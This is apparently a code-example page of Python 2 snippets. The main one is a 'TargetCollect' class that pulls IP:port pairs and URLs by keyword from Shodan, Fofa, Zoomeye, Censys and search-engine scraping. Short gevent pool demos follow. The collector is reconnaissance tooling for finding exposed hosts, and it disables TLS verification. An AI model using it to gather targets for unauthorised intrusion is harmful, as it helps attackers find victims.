            client = fofa.Client(self.fofa_email, self.fofa_token)
            for page in xrange(1, page):
                data = client.get_data(self.fofa_keyword,
                                       page=page,
                                       fields="ip,port")
                for ip, port in data["results"]:
                    print "[\033[0;32;40mFofa\033[0m] {}".format(ip + ":" +
                                                                 str(port))
                    self.ips_result.add(ip + ":" + str(port))
        except:
            print "[\033[0;35;40mFofa\033[0m] Error"
            pass

    def Zoomeye(self, page):
        def get_token(zoomeye_user, zoomeye_pass):
            try:
                data = {"username": zoomeye_user, "password": zoomeye_pass}
                data_encoded = json.dumps(data)
                data = requests.post(url='https://api.zoomeye.org/user/login',
                                     data=data_encoded)
                return json.loads(data.text)['access_token']
            except:
                pass
                print "[\033[0;35;40mZoomeye Token\033[0m] Error"

        try:
            token = get_token(self.zoomeye_user, self.zoomeye_pass)
            if not token:
                return
            r = requests.get(
                url="https://api.zoomeye.org/host/search?page={}&query={}".
                format(str(page), self.zoomeye_keyword),
                headers={'Authorization': 'JWT ' + token},
                verify=False,
                timeout=15)
            data = json.loads(r.text)
            for i in data['matches']:
                print "[\033[0;34;40mZoomeye\033[0m] {}".format(
                    i['ip'] + ':' + str(i['portinfo']['port']))
                self.ips_result.add(i['ip'] + ':' + str(i['portinfo']['port']))
        except:
            print "[\033[0;35;40mZoomeye\033[0m] Error"
            pass

    def Baidu(self, page):
        try:
            base_url = self.baidu_url.format(str(self.keyword), str(page))
            r = requests.get(base_url,
                             headers=self.headers,
                             verify=False,
                             timeout=15)
            p = etree.HTML(r.content)
            tags = p.xpath(u'//a[@class="c-showurl"]')
            for tag in tags:
                r = requests.get(tag.get('href'),
                                 headers=self.headers,
                                 verify=False,
                                 timeout=15)
                soup = BeautifulSoup(r.content, 'html.parser')
                chardet.detect(r.content)
                title = soup.title.string if soup.title and soup.title.string else ''
                if r.url and r.url not in self.urls_result:
                    print "[\033[0;36;40mBaidu\033[0m] {}\t{}".format(
                        r.url, title)
                    self.urls_result.add(r.url)
        except:
            # print "[\033[0;35;40mBaidu\033[0m] Error"
            pass

    def _360(self, page):
        try:
            base_url = self._360_url.format(str(self.keyword), str(page))
            r = requests.get(base_url,
                             headers=self.headers,
                             verify=False,
                             timeout=15)
            soup = BeautifulSoup(r.text, "html.parser")
            for a in soup.select('li.res-list > h3 > a'):
                r = requests.get(a['href'],
                                 headers=self.headers,
                                 verify=False,
                                 timeout=15)
                url = re.findall("URL='(.*?)'", r.text)[0] if re.findall(
                    "URL='(.*?)'", r.text) else r.url
                soup = BeautifulSoup(r.content, 'html.parser')
                chardet.detect(r.content)
                title = soup.title.string if soup.title and soup.title.string else ''
                if url and url not in self.urls_result:
                    print "[\033[0;37;40m360\033[0m] {}\t{}".format(url, title)
                    self.urls_result.add(url)
        except:
            # print "[\033[0;35;40m360\033[0m] Error"
            pass

    def Google(self, page=2):
        try:
            for i in xrange(0, 10 * page, 10):
                base_url = self.google_url.format(self.keyword, str(i))
                r = requests.get(base_url, headers=self.headers, timeout=15)
                soup = BeautifulSoup(r.text, "html.parser")
                for j in soup.select('div.g > h3.r > a[href^="/url"]'):
                    url = j.get('href').replace('/url?q=', '')
                    print "[\033[0;40;40m360\033[0m] {}".format(url)
                    self.urls_result.add(url)
        except:
            # print "[\033[0;35;40m360\033[0m] Error"
            pass

    def main(self):
        try:
            if self.keyword:
                self.pool.map(self.Baidu, xrange(self.page))
                self.pool.join()
                self.pool.map(self._360, xrange(self.page))
                self.pool.join()
                self.Google()
            if self.zoomeye_keyword:
                self.zoomeye_pool.map(self.Zoomeye, xrange(self.page))
                self.zoomeye_pool.join()

            if self.shodan_keyword: self.Shodan()
            if self.fofa_keyword: self.Fofa()
            if self.censys_keyword: self.Censys()

            if self.ips_result:
                print "[+] Found [{}] ips".format(len(self.ips_result))
                with open(self.ips_filename, "w") as f:
                    for ip in self.ips_result:
                        f.write(ip.strip() + "\n")
            if self.urls_result:
                print "[+] Total Found [{}] urls".format(len(self.urls_result))
                with open(self.urls_filename, "w") as f:
                    for url in self.urls_result:
                        f.write(url.strip() + "\n")
        except:
            traceback.print_exc()
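
A usage sketch (the keywords are placeholders; an empty value skips that source):

if __name__ == '__main__':
    collector = TargetCollect({
        'shodan': 'apache',
        'censys': '',
        'fofa': '',
        'zoomeye': '',
        'b3g': '',
    })
    collector.main()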
Example #9
# Required imports (inferred from usage); intensive() is a worker function
# not shown in this excerpt.
from gevent.pool import Group

print('Unordered')

igroup = Group()
for i in igroup.imap_unordered(intensive, xrange(3)):
    print(i)


import gevent
from gevent.pool import Pool

pool = Pool(2)

def hello_from(n):
    # len(pool) reports how many greenlets are currently active in the pool
    print('Size of pool %s' % len(pool))

pool.map(hello_from, xrange(3))



from gevent.pool import Pool

class SocketPool(object):

    def __init__(self):
        # the Pool caps concurrent socket handlers at 1000 greenlets
        self.pool = Pool(1000)

    def listen(self, socket):
        while True:
            socket.recv(1024)
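
A hedged driver sketch for SocketPool (the host, port and a pre-existing server are assumptions, not part of the excerpt):

import gevent
from gevent import socket

if __name__ == '__main__':
    sp = SocketPool()
    client = socket.create_connection(('127.0.0.1', 8000))
    sp.pool.spawn(sp.listen, client)
    gevent.sleep(1)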